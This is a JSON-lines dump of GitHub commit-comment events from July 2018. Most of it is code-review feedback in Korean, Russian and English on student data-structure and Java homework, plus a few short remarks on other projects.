{"id":"8000508617","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793348,"position":23,"line":25,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:43:10Z","updated_at":"2018-07-22T16:43:10Z","author_association":"NONE","body":"```c\r\nint MinInThree(struct PQueue *Q, int parent) {\r\n    int min = parent;\r\n    if (Q->queue[min].d > Q->queue[parent * 2]) {\r\n        min = parent * 2;\r\n    }\r\n    if (Q->queue[min].d > Q->queue[parent * 2 + 1]) {\r\n        min = parent * 2 + 1;\r\n    }\r\n    return min;\r\n```\r\n\r\n우선 parent가 가장 작다고 가정하고,\r\n첫 번째로 왼쪽 자식과 비교하고 min을 갱신하고\r\n두 번째로 오른쪽 자식과 방금 비교에서 얻은 min과 비교를 해서\r\n가장 작은 min index를 구할 수 있습니다.\r\n\r\n같은 로직의 코드지만 조금 더 깔끔하겠죠?"}},"created_at":"2018-07-22T16:43:10Z"}
{"id":"8000510752","type":"CommitCommentEvent","actor":{"login":"daeyg"},"repo":{"name":"samyak24jain/tourism-recommendation-system"},"payload":{"comment":{"id":29793349,"position":null,"line":null,"path":null,"commit_id":"021abb045ad7c0fcb0b19e8a831bae3d83dc1a8f","created_at":"2018-07-22T16:44:37Z","updated_at":"2018-07-22T16:44:37Z","author_association":"NONE","body":"Is this actually working though?\r\nTrying to work on a similar project"}},"created_at":"2018-07-22T16:44:37Z"}
{"id":"8000511034","type":"CommitCommentEvent","actor":{"login":"hivisoft21"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29793350,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-22T16:44:49Z","updated_at":"2018-07-22T16:44:49Z","author_association":"NONE","body":"great"}},"created_at":"2018-07-22T16:44:49Z"}
{"id":"8000512388","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793356,"position":44,"line":46,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:45:45Z","updated_at":"2018-07-22T16:45:45Z","author_association":"NONE","body":"0 번지를 사용하지 않고 있을 때를 잘 체크해주었네요."}},"created_at":"2018-07-22T16:45:45Z"}
{"id":"8000514041","type":"CommitCommentEvent","actor":{"login":"bukka"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29793359,"position":null,"line":null,"path":null,"commit_id":"ee561ff2a2ad6783c3f54092264ca2c622cf88f6","created_at":"2018-07-22T16:46:58Z","updated_at":"2018-07-22T16:46:58Z","author_association":"CONTRIBUTOR","body":"@nikic I agree. It doesn't make much sense to return `len`. Fixed in https://github.com/php/php-src/commit/26cd84d19f164f592f24593f4d1d1f7bd10696a6 and now it returns `ZLOG_FALSE` only if the allocation fails. The return value is not actually checked in stdio. It might make sense to skip the whole logging if it fails and possibly just log an error but not sure atm."}},"created_at":"2018-07-22T16:46:58Z"}
{"id":"8000515405","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"mongodb-js/mongodb-core"},"payload":{"comment":{"id":29793361,"position":null,"line":null,"path":null,"commit_id":"107bae5083d40b8521b5796469ddbc3ea2063c7a","created_at":"2018-07-22T16:47:59Z","updated_at":"2018-07-22T16:47:59Z","author_association":"MEMBER","body":"I traced down https://github.com/Automattic/mongoose/issues/6566 to this change. While I can understand the rationale for this change, perhaps we can try ipv4 and v6 in parallel rather than doing `family: 6` first and falling back to `family: 4 ` if that fails?"}},"created_at":"2018-07-22T16:47:59Z"}
{"id":"8000517128","type":"CommitCommentEvent","actor":{"login":"smcbkdkn"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29793366,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-22T16:49:15Z","updated_at":"2018-07-22T16:49:15Z","author_association":"NONE","body":"hola"}},"created_at":"2018-07-22T16:49:15Z"}
{"id":"8000517929","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793368,"position":79,"line":69,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:49:47Z","updated_at":"2018-07-22T16:49:47Z","author_association":"NONE","body":"첫 번째 노드를 마지막 노드로 덮어쓰고 있는데,\r\n가장 첫 노드와 마지막에 있는 노드를 그냥 swap 하는건 어떨까요?"}},"created_at":"2018-07-22T16:49:47Z"}
{"id":"8000518996","type":"CommitCommentEvent","actor":{"login":"orelkan"},"repo":{"name":"TechnionTDK/jbs-text2json"},"payload":{"comment":{"id":29793372,"position":null,"line":null,"path":null,"commit_id":"4e9cf071322f55c0318b90dc53546ca0a1e56ac5","created_at":"2018-07-22T16:50:34Z","updated_at":"2018-07-22T16:50:34Z","author_association":"CONTRIBUTOR","body":"Work time:\r\n1.25 hours"}},"created_at":"2018-07-22T16:50:34Z"}
{"id":"8000522947","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29793375,"position":null,"line":null,"path":null,"commit_id":"672717ff8783a9d49c3cffbe914660ab7744a3a7","created_at":"2018-07-22T16:53:30Z","updated_at":"2018-07-22T16:53:30Z","author_association":"OWNER","body":"Collision 78.90.1~78.92.2"}},"created_at":"2018-07-22T16:53:30Z"}
{"id":"8000523949","type":"CommitCommentEvent","actor":{"login":"TronikSenpai"},"repo":{"name":"jarengus/EU4-FIESTA"},"payload":{"comment":{"id":29793378,"position":null,"line":null,"path":null,"commit_id":"e396bfb9f7c8f04ab2cefecb47568ec2054f851b","created_at":"2018-07-22T16:54:14Z","updated_at":"2018-07-22T16:54:14Z","author_association":"COLLABORATOR","body":"Good Job"}},"created_at":"2018-07-22T16:54:14Z"}
{"id":"8000523974","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793379,"position":125,"line":148,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:54:15Z","updated_at":"2018-07-22T16:54:15Z","author_association":"NONE","body":"이거 맞나요?"}},"created_at":"2018-07-22T16:54:15Z"}
{"id":"8000524535","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793381,"position":182,"line":182,"path":"HWTask1.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:54:39Z","updated_at":"2018-07-22T16:54:39Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T16:54:39Z"}
{"id":"8000525135","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793382,"position":125,"line":148,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:55:07Z","updated_at":"2018-07-22T16:55:07Z","author_association":"NONE","body":"i번째 Vertex가 priority queue에서도 i번째에 있을까요?"}},"created_at":"2018-07-22T16:55:07Z"}
{"id":"8000525405","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793383,"position":53,"line":53,"path":"HWTask1.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:55:18Z","updated_at":"2018-07-22T16:55:18Z","author_association":"NONE","body":"не надо отступы лишние делать где попало"}},"created_at":"2018-07-22T16:55:18Z"}
{"id":"8000526406","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793385,"position":96,"line":96,"path":"HWTask1.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:56:04Z","updated_at":"2018-07-22T16:56:04Z","author_association":"NONE","body":"зачем дублировать код для месяцев, у которых идентичный алгоритм?"}},"created_at":"2018-07-22T16:56:04Z"}
{"id":"8000526662","type":"CommitCommentEvent","actor":{"login":"Janmm14"},"repo":{"name":"lukeeey/GoMint"},"payload":{"comment":{"id":29793386,"position":5,"line":11,"path":".gitignore","commit_id":"f7c7bbdd5a935189664488a25b7aa32688c1b5f9","created_at":"2018-07-22T16:56:13Z","updated_at":"2018-07-22T16:56:13Z","author_association":"NONE","body":"why?"}},"created_at":"2018-07-22T16:56:13Z"}
{"id":"8000526843","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793387,"position":173,"line":173,"path":"HWTask1.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:56:21Z","updated_at":"2018-07-22T16:56:21Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-22T16:56:21Z"}
{"id":"8000528150","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793392,"position":25,"line":25,"path":"HWTask2.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:57:17Z","updated_at":"2018-07-22T16:57:17Z","author_association":"NONE","body":"нечитабельно, выносить все в отдельные функции и упрощать"}},"created_at":"2018-07-22T16:57:17Z"}
{"id":"8000528252","type":"CommitCommentEvent","actor":{"login":"mintumintu"},"repo":{"name":"mintumintu/webproject"},"payload":{"comment":{"id":29793393,"position":5,"line":70,"path":"style.css","commit_id":"6916f4669356616d8bd79638838b89e95615a357","created_at":"2018-07-22T16:57:22Z","updated_at":"2018-07-22T16:57:22Z","author_association":"OWNER","body":"making the background color, as told by rajaramd4"}},"created_at":"2018-07-22T16:57:22Z"}
{"id":"8000528624","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793395,"position":127,"line":150,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:57:34Z","updated_at":"2018-07-22T16:57:34Z","author_association":"NONE","body":"여기도... 마찬가지로 visitingVertex의 index가 실제로 queue의 index랑 같을까요?"}},"created_at":"2018-07-22T16:57:34Z"}
{"id":"8000529179","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793397,"position":127,"line":150,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T16:57:59Z","updated_at":"2018-07-22T16:57:59Z","author_association":"NONE","body":"queue 안에 들어있는 Node의 vertexNo랑 같아야 하는것 아닌가요?"}},"created_at":"2018-07-22T16:57:59Z"}
{"id":"8000529936","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793399,"position":21,"line":21,"path":"HWTask3.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:58:31Z","updated_at":"2018-07-22T16:58:31Z","author_association":"NONE","body":"1. Нельзя объявялть несколько перменных в одну строку\r\n2. В данном случае лучше сразу объявить и проинициализировать переменную, в одну строку"}},"created_at":"2018-07-22T16:58:31Z"}
{"id":"8000530588","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793401,"position":40,"line":40,"path":"HWTask3.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:59:01Z","updated_at":"2018-07-22T16:59:01Z","author_association":"NONE","body":"ровно одно пустая строчка между функциями"}},"created_at":"2018-07-22T16:59:01Z"}
{"id":"8000530753","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793402,"position":33,"line":33,"path":"HWTask3.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:59:08Z","updated_at":"2018-07-22T16:59:08Z","author_association":"NONE","body":"тут зачем столько лишних пропусков?"}},"created_at":"2018-07-22T16:59:08Z"}
{"id":"8000530945","type":"CommitCommentEvent","actor":{"login":"bahelit"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29793403,"position":4,"line":34,"path":"polymer/src/my-app.html","commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-22T16:59:17Z","updated_at":"2018-07-22T16:59:17Z","author_association":"OWNER","body":"Isn't this referencing a folder called content?"}},"created_at":"2018-07-22T16:59:17Z"}
{"id":"8000531067","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793404,"position":48,"line":48,"path":"HWTask3.java","commit_id":"45aaece40da1a7bf72b53813234176de024f622a","created_at":"2018-07-22T16:59:22Z","updated_at":"2018-07-22T16:59:22Z","author_association":"NONE","body":"сразу return? не надо создавать переменных"}},"created_at":"2018-07-22T16:59:22Z"}
{"id":"8000531595","type":"CommitCommentEvent","actor":{"login":"rajaramd4"},"repo":{"name":"mintumintu/webproject"},"payload":{"comment":{"id":29793405,"position":5,"line":70,"path":"style.css","commit_id":"6916f4669356616d8bd79638838b89e95615a357","created_at":"2018-07-22T16:59:47Z","updated_at":"2018-07-22T16:59:47Z","author_association":"CONTRIBUTOR","body":"looking nice"}},"created_at":"2018-07-22T16:59:47Z"}
{"id":"8000532066","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793408,"position":5,"line":5,"path":"Lesson3HMTask2Recursion.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:00:06Z","updated_at":"2018-07-22T17:00:06Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-22T17:00:06Z"}
{"id":"8000533171","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793413,"position":11,"line":11,"path":"Lesson3HMTask2Recursion.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:00:46Z","updated_at":"2018-07-22T17:00:46Z","author_association":"NONE","body":"неверное решение, по условию задачи нужно было выводить последовательность до введенного числа"}},"created_at":"2018-07-22T17:00:46Z"}
{"id":"8000533500","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793414,"position":15,"line":15,"path":"Lesson3HMTask2Recursion.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:00:59Z","updated_at":"2018-07-22T17:00:59Z","author_association":"NONE","body":"не надо делать отступов в первой строчке метода"}},"created_at":"2018-07-22T17:00:59Z"}
{"id":"8000534019","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29793415,"position":null,"line":null,"path":null,"commit_id":"c1651e70a1f5d4634b250deece0465e3ffe60a9d","created_at":"2018-07-22T17:01:20Z","updated_at":"2018-07-22T17:01:20Z","author_association":"OWNER","body":"Collision 83.40.2~90"}},"created_at":"2018-07-22T17:01:20Z"}
{"id":"8000534164","type":"CommitCommentEvent","actor":{"login":"DiegoBuho"},"repo":{"name":"DiegoBuho/unity-git-test"},"payload":{"comment":{"id":29793416,"position":null,"line":null,"path":null,"commit_id":"11b8ef2377640f132980ae76737d0cda527533ba","created_at":"2018-07-22T17:01:25Z","updated_at":"2018-07-22T17:01:25Z","author_association":"OWNER","body":"back"}},"created_at":"2018-07-22T17:01:25Z"}
{"id":"8000535441","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793420,"position":20,"line":20,"path":"Lesson3HWTask2Loop.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:02:16Z","updated_at":"2018-07-22T17:02:16Z","author_association":"NONE","body":"выносить алгоритм в отдельные функции, в main только тестировать свой функционал"}},"created_at":"2018-07-22T17:02:16Z"}
{"id":"8000535990","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"lukeeey/GoMint"},"payload":{"comment":{"id":29793422,"position":5,"line":11,"path":".gitignore","commit_id":"f7c7bbdd5a935189664488a25b7aa32688c1b5f9","created_at":"2018-07-22T17:02:40Z","updated_at":"2018-07-22T17:02:40Z","author_association":"OWNER","body":"fixed in other commit"}},"created_at":"2018-07-22T17:02:40Z"}
{"id":"8000536320","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793423,"position":14,"line":14,"path":"Lesson3HWTask3.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:02:56Z","updated_at":"2018-07-22T17:02:56Z","author_association":"NONE","body":"не надо так далеко объявлять переменные от их первого использования"}},"created_at":"2018-07-22T17:02:56Z"}
{"id":"8000536646","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793425,"position":29,"line":29,"path":"Lesson3HWTask3.java","commit_id":"de7233de9cd6a5e438eedf6e9f8619a3e42bce5c","created_at":"2018-07-22T17:03:11Z","updated_at":"2018-07-22T17:03:11Z","author_association":"NONE","body":"теряешь вещественную часть"}},"created_at":"2018-07-22T17:03:11Z"}
{"id":"8000537436","type":"CommitCommentEvent","actor":{"login":"bahelit"},"repo":{"name":"bahelit/salmonpool-ui"},"payload":{"comment":{"id":29793427,"position":null,"line":null,"path":null,"commit_id":"61adb1139dd59674c3ac9391594493757d4298a4","created_at":"2018-07-22T17:03:43Z","updated_at":"2018-07-22T17:03:43Z","author_association":"OWNER","body":"'<link rel=\"lazy-import\" href=\"content/clo-content.html\">'\r\nThat looks like it's looking into a folder called content though.\r\n\r\nDid you notice I copied the content of all-stats to a new file called individual stats? The idea is to have that one file be called with the pool ID and return the stats for just that coin. Haven't implemented that yet though. Am going to be getting to it this evening (after 8), unless you want to do that.\r\n"}},"created_at":"2018-07-22T17:03:43Z"}
{"id":"8000537906","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793429,"position":26,"line":26,"path":"Lesson4HWTask1.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:04:03Z","updated_at":"2018-07-22T17:04:03Z","author_association":"NONE","body":"то же самое, все выносим в функции!"}},"created_at":"2018-07-22T17:04:03Z"}
{"id":"8000538087","type":"CommitCommentEvent","actor":{"login":"rzulian"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29793430,"position":4,"line":558,"path":"src/engine.ts","commit_id":"e7cf5662eaaea929fb5f2f80dc8b4563d4a2a165","created_at":"2018-07-22T17:04:10Z","updated_at":"2018-07-22T17:04:10Z","author_association":"COLLABORATOR","body":"What's the test case for those checks?"}},"created_at":"2018-07-22T17:04:10Z"}
{"id":"8000539323","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793432,"position":16,"line":16,"path":"Lesson4HWTask2.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:05:03Z","updated_at":"2018-07-22T17:05:03Z","author_association":"NONE","body":"вообще забыл про то, что нужно скобочки везде ставить, даже если конструкция занимает всего одну строчку "}},"created_at":"2018-07-22T17:05:03Z"}
{"id":"8000539809","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793433,"position":13,"line":13,"path":"Lesson4HWTask2.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:05:24Z","updated_at":"2018-07-22T17:05:24Z","author_association":"NONE","body":"просто if (!check[i])"}},"created_at":"2018-07-22T17:05:24Z"}
{"id":"8000542891","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29793439,"position":142,"line":185,"path":"graph/12_dijkstra_new.c","commit_id":"4ef0f545cbd2b6c4236e6695e2763545fbfa3e24","created_at":"2018-07-22T17:07:36Z","updated_at":"2018-07-22T17:07:36Z","author_association":"NONE","body":"Relax이후에 heapifyUpward를 하는데 중복이 아닐까요?\r\n첫 시작점을 PQ의 Top과 swap 해주고 시작하면 어떨까요?"}},"created_at":"2018-07-22T17:07:36Z"}
{"id":"8000542901","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793440,"position":29,"line":29,"path":"Lesson4HWTask2.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:07:36Z","updated_at":"2018-07-22T17:07:36Z","author_association":"NONE","body":"для такого простого алгоритма тебе понадобилось 4 массива, расточительно по памяти - это мягко сказано"}},"created_at":"2018-07-22T17:07:36Z"}
{"id":"8000546462","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793444,"position":18,"line":18,"path":"Lesson4HWTask4.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:10:16Z","updated_at":"2018-07-22T17:10:16Z","author_association":"NONE","body":"просто length += array[i].length"}},"created_at":"2018-07-22T17:10:16Z"}
{"id":"8000547711","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793446,"position":15,"line":15,"path":"Lesson4HWTask4ArrayList.java","commit_id":"5ae18626ae7111efeb66d4c532de977a8d7afcf8","created_at":"2018-07-22T17:11:10Z","updated_at":"2018-07-22T17:11:10Z","author_association":"NONE","body":"программировать на уровне интерфейсов надо, а не реализаций, мы этого еще не проходили, а ты не правильно используешь, поэтому не надо так"}},"created_at":"2018-07-22T17:11:10Z"}
{"id":"8000548845","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793450,"position":12,"line":12,"path":"Lesson5HWTask1.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:12:01Z","updated_at":"2018-07-22T17:12:01Z","author_association":"NONE","body":"не надо в лишние скобочки оборачивать, ухудшает читаемость кода"}},"created_at":"2018-07-22T17:12:01Z"}
{"id":"8000549168","type":"CommitCommentEvent","actor":{"login":"fedemarti"},"repo":{"name":"nacholin360/web_nacho"},"payload":{"comment":{"id":29793451,"position":null,"line":null,"path":null,"commit_id":"a00023e7c3fc15b16fdf8b97a8073f5a2bd4cc5f","created_at":"2018-07-22T17:12:15Z","updated_at":"2018-07-22T17:12:15Z","author_association":"COLLABORATOR","body":"cambiamos el timepo de redirect de 2 a 1"}},"created_at":"2018-07-22T17:12:15Z"}
{"id":"8000549584","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793454,"position":21,"line":21,"path":"Lesson5HWTask2.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:12:34Z","updated_at":"2018-07-22T17:12:34Z","author_association":"NONE","body":"мы же прошли строки. там есть хороший метод containce"}},"created_at":"2018-07-22T17:12:34Z"}
{"id":"8000550007","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793455,"position":25,"line":25,"path":"Lesson5HWTask2.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:12:54Z","updated_at":"2018-07-22T17:12:54Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-22T17:12:54Z"}
{"id":"8000550298","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793456,"position":31,"line":31,"path":"Lesson5HWTask2.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:13:09Z","updated_at":"2018-07-22T17:13:09Z","author_association":"NONE","body":"зачем делать эти лишние отступы?"}},"created_at":"2018-07-22T17:13:09Z"}
{"id":"8000550607","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793458,"position":28,"line":28,"path":"Lesson5HWTask2.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:13:22Z","updated_at":"2018-07-22T17:13:22Z","author_association":"NONE","body":"нормально называть переменные и параметры функции"}},"created_at":"2018-07-22T17:13:22Z"}
{"id":"8000550889","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"CetiStratos/JD1"},"payload":{"comment":{"id":29793460,"position":66,"line":66,"path":"Lesson5HWTask2.java","commit_id":"9b52cea6a3e0dea8cb71f86d0d80a69991e143ca","created_at":"2018-07-22T17:13:34Z","updated_at":"2018-07-22T17:13:34Z","author_association":"NONE","body":"разбивать все на функции"}},"created_at":"2018-07-22T17:13:34Z"}
{"id":"8000552583","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793464,"position":23,"line":23,"path":"src/homeTasks/lesson4/Task1.java","commit_id":"3b636b5a7fde1f680c3423165f289d22f02f6a36","created_at":"2018-07-22T17:14:53Z","updated_at":"2018-07-22T17:14:53Z","author_association":"NONE","body":"не надо выводить в консоль в алгоритма по сдвигу массива, в мейне делать это"}},"created_at":"2018-07-22T17:14:53Z"}
{"id":"8000553287","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29793471,"position":38,"line":38,"path":"x11-libs/libxcursor/libxcursor-1.1.15.recipe","commit_id":"a546a4746ec6d93def15cae2a6d8aaa633c27f89","created_at":"2018-07-22T17:15:23Z","updated_at":"2018-07-22T17:15:23Z","author_association":"MEMBER","body":"Good catch!\r\nI had created a recipe which had a `PROVIDES` for it, but forgot to commit it...\r\nIt was in my local tree for a long time, until I had a small `rm`accident... :(\r\nI've already searched for that recipe but all I can find are the binary packages of libxcursor which I had built at that time."}},"created_at":"2018-07-22T17:15:23Z"}
{"id":"8000554242","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793473,"position":22,"line":22,"path":"src/homeTasks/lesson4/Task1.java","commit_id":"3b636b5a7fde1f680c3423165f289d22f02f6a36","created_at":"2018-07-22T17:16:03Z","updated_at":"2018-07-22T17:16:03Z","author_association":"NONE","body":"а что будет в первом после этого? не сделано условие задание до конца"}},"created_at":"2018-07-22T17:16:03Z"}
{"id":"8000554665","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793474,"position":17,"line":17,"path":"src/homeTasks/lesson4/Task1.java","commit_id":"3b636b5a7fde1f680c3423165f289d22f02f6a36","created_at":"2018-07-22T17:16:21Z","updated_at":"2018-07-22T17:16:21Z","author_association":"NONE","body":"почему метод get* но сам он void? Давать нормальные названия методам"}},"created_at":"2018-07-22T17:16:21Z"}
{"id":"8000556705","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793477,"position":33,"line":33,"path":"src/homeTasks/lesson4/Task3.java","commit_id":"3b636b5a7fde1f680c3423165f289d22f02f6a36","created_at":"2018-07-22T17:17:49Z","updated_at":"2018-07-22T17:17:49Z","author_association":"NONE","body":"очень сложно написано, шаг влево - шаг вправо и выход за пределы массива или пульнешь не туда"}},"created_at":"2018-07-22T17:17:49Z"}
{"id":"8000557183","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29793478,"position":20,"line":20,"path":"src/homeTasks/lesson4/Task4.java","commit_id":"3b636b5a7fde1f680c3423165f289d22f02f6a36","created_at":"2018-07-22T17:18:11Z","updated_at":"2018-07-22T17:18:11Z","author_association":"NONE","body":"разбивать на методы, расчет размера массива - это другой алгоритм"}},"created_at":"2018-07-22T17:18:11Z"}
